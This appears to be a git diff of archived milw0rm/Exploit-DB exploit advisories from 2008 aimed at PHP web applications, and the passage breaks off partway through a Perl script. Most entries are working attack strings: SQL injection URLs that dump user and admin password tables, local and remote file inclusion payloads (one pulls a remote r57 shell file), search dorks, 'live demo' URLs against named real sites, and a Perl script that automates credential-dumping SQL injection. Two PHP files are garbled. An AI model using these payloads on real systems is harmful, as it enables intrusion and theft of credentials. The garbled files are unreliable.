+Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php
+
+Vulnerable GET parameters "lang".
+
+Successful exploitation requires that "register_globals" is enabled.
+
+Code
+****
+#################################################
+
+...
+        $_dir_file = dirname(dirname(__FILE__));
+        $_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
+        
+        if ($_dir_file != $_dir_path) {
+                if (!isset($settings['minishowcase_url'])
+                        || ($settings['minishowcase_url'] == "")) {
+                        die ("
    ALERT: if you are including minishowcase with PHP into a website, please set the \$minishowcase_url variable in the /config/settings.php file
    ");
+                }
+        }
+...
+        if (isset($_GET["lang"])) $set_language = $_GET["lang"];
+        $langfile = ROOT.'languages/'.$set_language.'.php';
+        require_once($langfile);
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00
+
+
+Solution
+********
+
+No response or any updates from vendor.
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+
+Contact:    research [at] dsec [dot] ru
+            http://www.dsec.ru (in Russian)
+
+# milw0rm.com [2008-07-29]
diff --git a/platforms/php/webapps/6159.txt b/platforms/php/webapps/6159.txt
index e6077b65f..88eaeb0ad 100755
--- a/platforms/php/webapps/6159.txt
+++ b/platforms/php/webapps/6159.txt
@@ -1,70 +1,70 @@
-##########################################################
-# GulfTech Security Research                July 29, 2008
-##########################################################
-# Vendor : Marco Bonetti
-# URL : http://www.gregarius.net/
-# Version :  Gregarius <= 0.5.4
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-Gregarius is a popular web-based RSS/RDF/ATOM feed aggregator
-written in php. There are some SQL Injection issues in Gregarius
-that allow for the disclosure of database contents and ultimately
-the complete compromise of the Gregarius installation via exposed
-admin credentials. It is advised that Gregarius users update their
-gregarius installations as soon as possible.
-
-
-
-SQL Injection:
-Gregarius contains a number of SQL Injection issues that allow for
-an attacker to expose admin credentials with no kind of authentication
-needed. Lets have a look at the following code taken from /ajax.php
-
-
-function __exp__getFeedContent($cid) {
-    ob_start();
-    rss_require('cls/items.php');
-    
-    $readItems = new ItemList();
-
-    $readItems -> populate(" not(i.unread & ". RSS_MODE_UNREAD_STATE  .")
-    and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ);
-    $readItems -> setTitle(LBL_H2_RECENT_ITEMS);
-    $readItems -> setRenderOptions(IL_TITLE_NO_ESCAPE);
-    foreach ($readItems -> feeds[0] -> items as $item) {
-        $item -> render();
-    }
-    $c = ob_get_contents();
-    
-    ob_end_clean();
-    return "$cid|@|$c";
-}
-
-
-The above function is called by sajax_handle_client_request() and
-allows for an attacker to specify the content of $cid via the rsargs[]
-array. This being the case an attacker is able to influence the query
-regardless of magic_quotes_gps settings etc.
-
-/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99 UNION SELECT concat(
-char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*
-
-The above query would successfully dump the users table to the browser.
-The password hashes in the database are md5 encrypted, but an attacker
-only need to md5 encrypt that password hash and place it in a cookie with the format of user|hash to gain access to the administrative controls.
-
-
-
-Solution:
-The Gregarius developers have been made aware of this issue, and users
-are encouraged to upgrade as soon as possible.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-# milw0rm.com [2008-07-29]
+##########################################################
+# GulfTech Security Research                July 29, 2008
+##########################################################
+# Vendor : Marco Bonetti
+# URL : http://www.gregarius.net/
+# Version :  Gregarius <= 0.5.4
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+Gregarius is a popular web-based RSS/RDF/ATOM feed aggregator
+written in php. There are some SQL Injection issues in Gregarius
+that allow for the disclosure of database contents and ultimately
+the complete compromise of the Gregarius installation via exposed
+admin credentials. It is advised that Gregarius users update their
+gregarius installations as soon as possible.
+
+
+
+SQL Injection:
+Gregarius contains a number of SQL Injection issues that allow for
+an attacker to expose admin credentials with no kind of authentication
+needed. Lets have a look at the following code taken from /ajax.php
+
+
+function __exp__getFeedContent($cid) {
+    ob_start();
+    rss_require('cls/items.php');
+    
+    $readItems = new ItemList();
+
+    $readItems -> populate(" not(i.unread & ". RSS_MODE_UNREAD_STATE  .")
+    and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ);
+    $readItems -> setTitle(LBL_H2_RECENT_ITEMS);
+    $readItems -> setRenderOptions(IL_TITLE_NO_ESCAPE);
+    foreach ($readItems -> feeds[0] -> items as $item) {
+        $item -> render();
+    }
+    $c = ob_get_contents();
+    
+    ob_end_clean();
+    return "$cid|@|$c";
+}
+
+
+The above function is called by sajax_handle_client_request() and
+allows for an attacker to specify the content of $cid via the rsargs[]
+array. This being the case an attacker is able to influence the query
+regardless of magic_quotes_gps settings etc.
+
+/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99 UNION SELECT concat(
+char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*
+
+The above query would successfully dump the users table to the browser.
+The password hashes in the database are md5 encrypted, but an attacker
+only need to md5 encrypt that password hash and place it in a cookie with the format of user|hash to gain access to the administrative controls.
+
+
+
+Solution:
+The Gregarius developers have been made aware of this issue, and users
+are encouraged to upgrade as soon as possible.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+# milw0rm.com [2008-07-29]
diff --git a/platforms/php/webapps/6160.txt b/platforms/php/webapps/6160.txt
index df32748c7..583a5073c 100755
--- a/platforms/php/webapps/6160.txt
+++ b/platforms/php/webapps/6160.txt
@@ -1,14 +1,14 @@
-# Name Of Script : PHP Hosting Directory 2.0 
-# Download From : http://jnshosts.com/download/phphost_directory.zip
-# Found By : RoMaNcYxHaCkEr
-# My Homepage : WwW.4RxH.CoM
-# My Group : [RoMaNTiC-TeaM]
-# Type Of Exploit : RFI
-# P.O.C. : http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?
-# Good Luck
-# Note : If You Lamerz , Kidz Or Snitch Just I Said For You (Fuck You)
-# Contact Me : RxH0@HoTMaiL.CoM
-# rXh
-# bEST wISHES
-
-# milw0rm.com [2008-07-29]
+# Name Of Script : PHP Hosting Directory 2.0 
+# Download From : http://jnshosts.com/download/phphost_directory.zip
+# Found By : RoMaNcYxHaCkEr
+# My Homepage : WwW.4RxH.CoM
+# My Group : [RoMaNTiC-TeaM]
+# Type Of Exploit : RFI
+# P.O.C. : http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?
+# Good Luck
+# Note : If You Lamerz , Kidz Or Snitch Just I Said For You (Fuck You)
+# Contact Me : RxH0@HoTMaiL.CoM
+# rXh
+# bEST wISHES
+
+# milw0rm.com [2008-07-29]
diff --git a/platforms/php/webapps/6161.txt b/platforms/php/webapps/6161.txt
index dd79d27f4..73e7875d4 100755
--- a/platforms/php/webapps/6161.txt
+++ b/platforms/php/webapps/6161.txt
@@ -1,23 +1,23 @@
-####################################################################################################
- HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
-####################################################################################################
-[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
-[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
-[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
-[~] Name Script : HIOX Random Ad 1.3
-[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Error (hioxRandomAd.php) :
-include "$hm/admin/props.php";
-[~] Exploit :
-http://xxxx.com/[path]/hioxRandomAd.php?hm=Evil_Code
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Greetz :
-Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
-All Members Real Hack & Members Arabs Security And All My Friends ,
-####################################################################################################
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
-####################################################################################################
-
-# milw0rm.com [2008-07-30]
+####################################################################################################
+ HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
+####################################################################################################
+[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
+[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
+[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
+[~] Name Script : HIOX Random Ad 1.3
+[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Error (hioxRandomAd.php) :
+include "$hm/admin/props.php";
+[~] Exploit :
+http://xxxx.com/[path]/hioxRandomAd.php?hm=Evil_Code
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Greetz :
+Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
+All Members Real Hack & Members Arabs Security And All My Friends ,
+####################################################################################################
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
+####################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6162.txt b/platforms/php/webapps/6162.txt
index 31c02db8d..8044c5d02 100755
--- a/platforms/php/webapps/6162.txt
+++ b/platforms/php/webapps/6162.txt
@@ -1,24 +1,24 @@
-####################################################################################################
- HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
-####################################################################################################
-[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
-[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
-[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
-[~] Name Script : HIOX Browser Statistics 2.0
-[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Error (hioxupdate.php + hioxstats.php) :
-include "$hm/browser.php";
-[~] Exploit :
-http://xxxx.com/[path]/hioxupdate.php?hm=Evil_Code
-http://xxxx.com/[path]/hioxstats.php?hm=Evil_Code
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Greetz :
-Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
-All Members Real Hack & Members Arabs Security And All My Friends ,
-####################################################################################################
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
-####################################################################################################
-
-# milw0rm.com [2008-07-30]
+####################################################################################################
+ HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
+####################################################################################################
+[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
+[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
+[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
+[~] Name Script : HIOX Browser Statistics 2.0
+[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Error (hioxupdate.php + hioxstats.php) :
+include "$hm/browser.php";
+[~] Exploit :
+http://xxxx.com/[path]/hioxupdate.php?hm=Evil_Code
+http://xxxx.com/[path]/hioxstats.php?hm=Evil_Code
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Greetz :
+Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
+All Members Real Hack & Members Arabs Security And All My Friends ,
+####################################################################################################
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
+####################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6164.txt b/platforms/php/webapps/6164.txt
index 32bcb8c07..eb0e3c360 100755
--- a/platforms/php/webapps/6164.txt
+++ b/platforms/php/webapps/6164.txt
@@ -1,24 +1,24 @@
-#####################################################################################
-####                           nzFotolog v0.4.1 (Lfi)                            ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
-#Discovered by : IRCRASH (R3d.W0rm)                                                 #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm                                         #
-#####################################################################################
-#                                                                                   #
-#Script Download : www.nazgulled.net                                                #
-#                                                                                   #
-#DORK : "Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral"                    #
-#                                                                                   #
-#####################################################################################
-#                                       [Lfi]                                       #
-#                                                                                   #
-#http://Example/index.php?action_file=file.type%00                                  #
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-07-30]
+#####################################################################################
+####                           nzFotolog v0.4.1 (Lfi)                            ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
+#Discovered by : IRCRASH (R3d.W0rm)                                                 #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm                                         #
+#####################################################################################
+#                                                                                   #
+#Script Download : www.nazgulled.net                                                #
+#                                                                                   #
+#DORK : "Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral"                    #
+#                                                                                   #
+#####################################################################################
+#                                       [Lfi]                                       #
+#                                                                                   #
+#http://Example/index.php?action_file=file.type%00                                  #
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6165.txt b/platforms/php/webapps/6165.txt
index 33ad6e0ef..6f0f2b96b 100755
--- a/platforms/php/webapps/6165.txt
+++ b/platforms/php/webapps/6165.txt
@@ -1,39 +1,39 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## ZeeReviews ( comments.php ItemID )
-##                            
-## http://www.zeescripts.com                            
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-##
-## -[[: Exploite :]]-
-##
-##   www.Target.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-30]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## ZeeReviews ( comments.php ItemID )
+##                            
+## http://www.zeescripts.com                            
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+##
+## -[[: Exploite :]]-
+##
+##   www.Target.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6166.php b/platforms/php/webapps/6166.php
index 0f0f60b8e..7c03bfc1d 100755
--- a/platforms/php/webapps/6166.php
+++ b/platforms/php/webapps/6166.php
@@ -1,68 +1,68 @@
-
-
    
-");
-        fclose($file);
-    $creat = "false"; 
-    echo "
    New User Created
-  
-  
    Please Wait You will be Redirected to Login Page
-   
    ";
-    }
-    else{
-        echo "
    Enter correct Username or Password 
    ";
-    }
-}
-if($creat == "true"){
-?>
-
-
-     
    
- Create New User 
    
-        
    >
-        
-        
-        
-        
-        
-        
    User Name
-                
    Password
    
- 
    
-
    
-User Already Exist";
-}
-?>
-
    
-
-# milw0rm.com [2008-07-30]
+
+
    
+");
+        fclose($file);
+    $creat = "false"; 
+    echo "
    New User Created
+  
+  
    Please Wait You will be Redirected to Login Page
+   
    ";
+    }
+    else{
+        echo "
    Enter correct Username or Password 
    ";
+    }
+}
+if($creat == "true"){
+?>
+
+
+     
    
+ Create New User 
    
+        
    >
+        
+        
+        
+        
+        
+        
    User Name
+                
    Password
    
+ 
    
+
    
+User Already Exist";
+}
+?>
+
    
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6167.txt b/platforms/php/webapps/6167.txt
index 8182634d1..b532d2bf8 100755
--- a/platforms/php/webapps/6167.txt
+++ b/platforms/php/webapps/6167.txt
@@ -1,43 +1,43 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## Article Friendly Pro ( categorydetail.php Cat )
-##
-## Article Friendly Standard ( authordetail.php autid )
-##                            
-## http://www.articlefriendly.com/                           
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-##
-## -[[: Exploites :]]-
-##
-## [[ Article Friendly Pro ]]       www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
-##
-## [[ Article Friendly Standard ]]  www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0/*
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-30]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## Article Friendly Pro ( categorydetail.php Cat )
+##
+## Article Friendly Standard ( authordetail.php autid )
+##                            
+## http://www.articlefriendly.com/                           
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.AtsDp.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+##
+## -[[: Exploites :]]-
+##
+## [[ Article Friendly Pro ]]       www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
+##
+## [[ Article Friendly Standard ]]  www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0/*
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6168.php b/platforms/php/webapps/6168.php
index 6734e309e..a6989bcc7 100755
--- a/platforms/php/webapps/6168.php
+++ b/platforms/php/webapps/6168.php
@@ -1,68 +1,68 @@
-
-
    
-");
-        fclose($file);
-    $creat = "false"; 
-    echo "
    New User Created
-  
-  
    Please Wait You will be Redirected to Login Page
-   
    ";
-    }
-    else{
-        echo "
    Enter correct Username or Password 
    ";
-    }
-}
-if($creat == "true"){
-?>
-
-
-     
    
- Create New User 
    
-        
    >
-        
-        
-        
-        
-        
-        
    User Name
-                
    Password
    
- 
    
-
    
-User Already Exist";
-}
-?>
-
    
-
-# milw0rm.com [2008-07-30]
+
+
    
+");
+        fclose($file);
+    $creat = "false"; 
+    echo "
    New User Created
+  
+  
    Please Wait You will be Redirected to Login Page
+   
    ";
+    }
+    else{
+        echo "
    Enter correct Username or Password 
    ";
+    }
+}
+if($creat == "true"){
+?>
+
+
+     
    
+ Create New User 
    
+        
    >
+        
+        
+        
+        
+        
+        
    User Name
+                
    Password
    
+ 
    
+
    
+User Already Exist";
+}
+?>
+
    
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6169.txt b/platforms/php/webapps/6169.txt
index d544a3528..f3d400b51 100755
--- a/platforms/php/webapps/6169.txt
+++ b/platforms/php/webapps/6169.txt
@@ -1,64 +1,64 @@
-|___________________________________________________|
-|
-| Classified Ads (cid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=5
-|
-| DorK   : inurl:browsecats.php?cid=
-|___________________________________________________|
-
-
-
-
-
-
-Exploit:  
-
-www.[target].com/Script/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
-
-
-
-
-L!VE DEMO:
-
-
-http://www.bbx.com/bbxca/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
-
-
-________________________
-table_name : column_name
-
-bbxbzauctions_admin:admin_name
-bbxbzauctions_admin:pwd
-freetplbanners_admin:admin_name
-freetplbanners_admin:pwd
-
-________________________
-
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|   
-| Iraqihack | FAHD | mos_chori | Silic0n 
-|
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-30]
+|___________________________________________________|
+|
+| Classified Ads (cid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=5
+|
+| DorK   : inurl:browsecats.php?cid=
+|___________________________________________________|
+
+
+
+
+
+
+Exploit:  
+
+www.[target].com/Script/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
+
+
+
+
+L!VE DEMO:
+
+
+http://www.bbx.com/bbxca/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
+
+
+________________________
+table_name : column_name
+
+bbxbzauctions_admin:admin_name
+bbxbzauctions_admin:pwd
+freetplbanners_admin:admin_name
+freetplbanners_admin:pwd
+
+________________________
+
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|   
+| Iraqihack | FAHD | mos_chori | Silic0n 
+|
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6170.txt b/platforms/php/webapps/6170.txt
index 78a3128b4..46056d34f 100755
--- a/platforms/php/webapps/6170.txt
+++ b/platforms/php/webapps/6170.txt
@@ -1,55 +1,55 @@
-|___________________________________________________|
-|
-| TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-|
-| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=3
-|
-| DorK   : inurl:ugroups.php?UID=
-|
-|___________________________________________________|
-
-
-
-Exploit:  
-
-www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
-
-
-
-L!VE DEMO: :
-
-
-http://www.tubeguru.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
-
-
-
-admin login :
-
-www.[target].com/Script/admin2/siteadmin/index.php
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|   
-| Iraqihack | FAHD | mos_chori | Silic0n 
-|
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-30]
+|___________________________________________________|
+|
+| TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+|
+| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=3
+|
+| DorK   : inurl:ugroups.php?UID=
+|
+|___________________________________________________|
+
+
+
+Exploit:  
+
+www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
+
+
+
+L!VE DEMO: :
+
+
+http://www.tubeguru.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
+
+
+
+admin login :
+
+www.[target].com/Script/admin2/siteadmin/index.php
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|   
+| Iraqihack | FAHD | mos_chori | Silic0n 
+|
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6171.pl b/platforms/php/webapps/6171.pl
index 8b38653f8..d78786ee3 100755
--- a/platforms/php/webapps/6171.pl
+++ b/platforms/php/webapps/6171.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-#/-----------------------------------------------\
-#|  /-----------------------------------------\  |
-#|  |  Remote SQL Exploit                     |  |
-#|  |  eNdonesia 8.4 Remote SQL Exploit       |  |
-#|  |  www.endonesia.org                      |  |
-#|  |  Calendar Module                        |  |
-#|  \-----------------------------------------/  |
-#|  /-----------------------------------------\  |
-#|  |  Presented By Jack                      |  |
-#|  |  MainHack Enterprise                    |  |
-#|  |  www.MainHack.com & irc.nob0dy.net      |  | 
-#|  |  #MainHack #nob0dy #BaliemHackerlink    |  |
-#|  |  Jack[at]MainHack[dot]com               |  |
-#|  \-----------------------------------------/  |
-#|  /-----------------------------------------\  |
-#|  |  Hello To: Indonesian h4x0r             |  |
-#|  |  yadoy666,n0c0py & okedeh               |  |
-#|  |  VOP Crew [Vaksin13,OoN_BoY,Paman]      |  |
-#|  |  NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull  |  |
-#|  |  all MainHack BrotherHood               |  |
-#|  \-----------------------------------------/  |
-#\-----------------------------------------------/
- 
-  use HTTP::Request;
-  use LWP::UserAgent;
-
-  $sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
-  $sql_injection  = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd";
-
-  if(!@ARGV) { &help;exit(1);}
-
-  sub help(){
-       print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
-       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
-       print " [?] Use : perl $0 www.target.com\n";
-       print " [?] Dont use \"http://\"\n";                                                                                    
-       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
-       print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
-       print " [?] www.MainHack.com\n\n";
-  }
-
-  while (){
-      my $target    = $ARGV[0];
-       my $exploit   = "http://".$target.$sql_vulnerable.$sql_injection;
-       print "\n [-] Trying to inject $target ...\n\n";
-       my $request   = HTTP::Request->new(GET=>$exploit);
-       my $useragent = LWP::UserAgent->new();
-       $useragent->timeout(10);
-       my $response   = $useragent->request($request);
-       if ($response->is_success){
-               my $res = $response->content;
-               if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
